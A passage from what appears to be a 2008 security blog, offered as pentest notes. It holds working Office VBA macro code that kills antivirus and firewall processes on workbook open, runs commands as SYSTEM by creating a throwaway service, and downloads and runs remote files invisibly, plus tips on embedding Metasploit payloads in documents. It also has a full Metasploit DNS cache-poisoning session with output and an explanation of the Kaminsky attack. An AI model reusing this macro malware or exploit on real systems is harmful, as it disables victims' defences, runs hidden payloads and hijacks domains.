    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winactive.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""win-bugsfix.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""window.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""windows.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininetd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininitx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winlogin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winmain.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winnet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winppr32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winrecon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winservn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winssk32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart001.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wintsk32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""winupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wkufind.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnad.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wradmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wrctrl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wsbgate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdater.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wyvernworksfirewall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""xpf202en.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapro.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapsetup3001.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zatutor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonalm2601.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""
       
    Run_Sys_Cmds arrayCmds, INVISIBLE, WAIT
End Function


Call it with a simple:
Sub Workbook_Open()
    Kill_AV
End Sub
Bloggerized by Nathan Keltner at 6:32 PM 4 comments

Running commands as SYSTEM from VBA in Word or Excel

Sometime's it is useful to run commands with SYSTEM level privilege because, for some reason, simply having Administrator won't allow you to do something you need. I often run into this with trying to kill antivirus processes or similar, as they usually require some sort of password to shut them off. If you kill it from under the SYSTEM account, however, it'll shut off without any problems:

Function Run_Sys_Cmds(arrayCmds As Variant, visibility, wait_on_execute)

    Set fso = CreateObject("Scripting.FileSystemObject")
    Set systemCmd = fso.CreateTextFile(Environ("TEMP") & "\systemCmd.vbs")
    Set batchRun = fso.CreateTextFile(Environ("TEMP") & "\systemBatch.bat")
   
    systemCmd.WriteLine ("CreateObject(""Wscript.Shell"").Run """ & Environ("TEMP") & "\systemBatch.bat" & """, " & visibility & ", " & wait_on_execute)
   
    For Each cmd In arrayCmds
        batchRun.WriteLine (cmd)
    Next cmd
   
    systemCmd.Close
    batchRun.Close
   
    Run_Cmd "sc create systemCmd binpath= ""%COMSPEC% /c wscript %TEMP%\systemCmd.vbs "" type= own type= interact", INVISIBLE, WAIT
    Run_Cmd "sc start systemCmd", INVISIBLE, WAIT
    Run_Cmd "sc delete systemCmd", INVISIBLE, WAIT
    Kill Environ("TEMP") & "\systemCmd.vbs"
    Kill Environ("TEMP") & "\systemBatch.bat"

End Function

This version only accepts an array of commands to be processed. I found that it was way too slow to process a large number of commands unless you did it this way. It would be simple to modify to accept a regular String instead, if you wish to change it to use it for one-off commands.

You'd call this with something like:
    Dim syscmd(1) As String
    syscmd(0) = "set && pause"
    syscmd(1) = "ping 127.0.0.1"
    Run_Sys_Cmds syscmd, VISIBLE, WAIT

It executes commands at the SYSTEM level by creating a service that will run your command for you. Unless you specify otherwise, services always run as the SYSTEM account. Creating services is only possible if you have Administrator-level privileges on the system, so I really only find this useful to get around locked files or antivirus.

It's on my TO DO list to play with the token-kidnapping exploit for Windows Server 2003/2008 (and supposedly XP2?) that allows any authenticated user to gain SYSTEM privileges. Unfortunately, I haven't had time to play with it yet.
Bloggerized by Nathan Keltner at 6:16 PM 3 comments

VBA Function to Download Files

So, what happens if the payload you want to run is too large to directly paste into an Excel or Word document with metasploit's exe2vba? Why don't you just download it from the internet?

Unfortunately, MS didn't decide to give us a copy of wget, so we have to write it ourselves. This function uses the XMLHTTP object to download binary files and write them to disk. I don't remember where I found this code, but just for full disclosure, I didn't write it:

Function Download_File(ByVal vWebFile As String, ByVal vLocalFile As String) As Boolean
Dim oXMLHTTP As Object, i As Long, vFF As Long, oResp() As Byte

'You can also set a ref. to Microsoft XML, and Dim oXMLHTTP as MSXML2.XMLHTTP
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", vWebFile, False 'Open socket to get the website
oXMLHTTP.Send 'send request

'Wait for request to finish
Do While oXMLHTTP.readyState <> 4
DoEvents
Loop

oResp = oXMLHTTP.responseBody 'Returns the results as a byte array

'Create local file and save results to it
vFF = FreeFile
If Dir(vLocalFile) <> "" Then Kill vLocalFile
Open vLocalFile For Binary As #vFF
Put #vFF, , oResp
Close #vFF

'Clear memory
Set oXMLHTTP = Nothing
End Function


Here's the call that will download a copy of the Tiny Web Server to the %TEMP% directory and use the local installation of Winzip to install it:

Sub Workbook_Open()
'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
'Obviously in a real world application you'd want to bring your own unzipper
Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") & "\tinyweb.zip"
Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT
End Sub

Bloggerized by Nathan Keltner at 6:10 PM 5 comments

On VBA in Excel and Word Documents...

There have been a few posts around the interwebs recently on how to use VBA to boobytrap Excel or Word documents with executables that will run on startup. I've been playing with it a bit and thought I'd write a series of posts on my findings to store this info in one place, in case anyone else finds this stuff useful in pentests.

First, a quick note on converting executables to store in VBA. Based on my testing, the default Visual Basic Editor (VBE) that comes with MS Office 2003 (haven't tested 2007 yet) has a relatively low memory limit on how much you can store inside the script sections. This correlates to a max executable filesize of around 32k on my system. Anything larger than that you won't be able to paste in the output from metasploit's exe2vba because you will recieve an error message, "Not Enough Memory".

I'm sure you could convert this script to allow you to store the hex strings inside a hidden, locked worksheet and reference it from the code sections. I don't know how many of you will run into this, as many of the metasploit payloads are only around ~10k.

Back to VBA, we'll start with a couple of simple functions that will allow you to run invisible commands or programs on the system:

Sub Run_Cmd(command, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute
End Sub

Sub Run_Program(program, arguments, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run program & " " & arguments & " ", visibility, wait_on_execute
End Sub


These would be called from within the "ThisWorkbook" tab in VBE with a function like:

Const VISIBLE = 1, INVISIBLE = 0
Const WAIT = True, NOWAIT = False

Sub Workbook_Open()
Run_Cmd "ping 127.0.0.1", VISIBLE, WAIT
Run_Program "notepad.exe", "", VISIBLE, NOWAIT
End Sub


INVISIBLE / VISIBLE does just what you would think: toggles the visibility of the program or command as you wish. WAIT / NOWAIT also functions as you would expect; if set to WAIT, the VBA execution will halt until the process finishes. NOWAIT continues execution as soon as the program/command begins.
Bloggerized by Nathan Keltner at 5:49 PM 1 comments

Friday, July 25, 2008

AV Industry: Then and Now

Via twitter:
Bloggerized by Nathan Keltner at 7:26 AM 3 comments
Labels: , , ,

Thursday, July 24, 2008

U CAN HAZ METASPLOIT TOO. ENJOI.

(svn update will pull the current code in... it's under intense revisioning right now; something like 6 revisions in 5 hours this morning)

The current version will actually replace the cached entries for the name server itself, allowing you to hijack entire domains at once. Previous code (form earlier this morning) would allow you to take over individual entries (e.g. randomwhatever.example.com), but now you can take over (*.example.com).

Patch up, children.

-n

http://www.caughq.org/exploits/CAU-EX-2008-0003.txt

# /msf3/msfconsole

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##


=[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

b.iana-servers.net.
a.iana-servers.net.

msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed

msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

dns01.metasploit.com.
Bloggerized by Nathan Keltner at 8:44 AM 2 comments
Labels: , , ,

Tuesday, July 22, 2008

More info on DNS Hierarchy and determining bailiwick

Anyone interested in reading more on how DNS zones and heirarchies ("bailiwick") are determined, check these articles from linuxjournal.com:

Digging Up Dirt in the DNS Hierarchy, Part I
Digging Up Dirt in the DNS Hierarchy, Part II

It should clear it up for anyone still confused about how DNS is supposed to function and why the current protections (pre-Kaminsky) were put in place.
Bloggerized by Nathan Keltner at 8:53 AM 0 comments
Labels: , ,

Monday, July 21, 2008

Kaminsky's DNS Issue Accidentally Leaked?

[Update 2: Thomas Ptacek of Matasano has since posted a public apology to Dan et al for the accidental postage. Regarding The Post On Chargen Earlier Today.]

[Update 1: Upon re-reading Halvar's explanation, it appears he got it closer than I originally thought, missing only the part about "bailiwick checking", which prevents a request for arbitrary.invisibledenizen.org from poisoning ns1.google.com. Halvar's solution, as written, would fail as I understand it. But one minor change (to using subdomains) makes it all function.]

It appears matasano posted an explanation of Dan Kaminsky's DNS issue to their blog today, but looks like it may have been yanked back down. My google reader account nabbed it via the RSS feed while it was up.

It looks like maybe they had this typed up, ready to hit "post" as soon as someone else figured it out? They had advance knowledge of the issue via conference calls with Kaminsky, and when Halvar Flake posted some speculation on what the issue was, they referred to Halvar's post and their explanation hit the matasano blog. But Halvar's speculation was not the full issue; only a re-hash of previously known issues. Halvar's ideas were close, but incomplete. Matasano filled in the missing details, possibly by accident. :)

Rather than re-post their entire section and get crossways with copyright complaints, here's a summary of their explanation:

  1. There's a general principle of cryptography that says if you have to guess Variable A, it's incredibly helpful to be able to make as many iterations of variable A as possible. (See wikipedia's entry on "birthday attack" or google for more details.)
  2. DNS only uses a random 16-bit transaction ID that must be guessed in order to poison a DNS server's cache, and it must be guessed before the legitimate answer comes back. This is difficult to do on any individual requests scale.
  3. If you can slam a server with tons of requests, Point 1 above comes into play and allows you to reliably and quickly get at least 1 DNS cache poisoning packet to match the transaction ID. (Halvar's guess said this: force requests for random0000001.com, random0000002.com, etc, to generate a large amount of Variable A's. Eventually you'll guess one right.)
  4. This is obviously not very helpful. So what if I can poison bankofamerica349543.com.
  5. OK, so what about DNS wildcards? If you are able to poison random00001.invisibledenizen.org, what does that get you? Enter the additional RR set field. This allows you to piggy back additional DNS responses in addition to what was requested. For security reasons, you can only respond with additional answers for addresses that match the same domain. (E.g., if I submit a request for arbitrary.domain.com, the additional response section can only return info for domain.com sub-domains.)
  6. So the attack is this: do the above to cache poison randomXXXX.invisibledenizen.org, and in each packet have the additional RR return answers for ns1.invisibledenizen.org. Whenever random42156.invisibledenizen.org is the magical response that finds the transaction ID and poisons the cache, it will also poison the record for my nameserver, ns1.invisibledenizen.org.
Matasona stated this attack could occur in "less than 10 seconds" with current internet speeds.

Anyone want to throw together a metasploit aux module for this?

:)

-N
Bloggerized by Nathan Keltner at 3:05 PM 10 comments
Labels: , , , , ,
Subscribe to: Posts (Atom)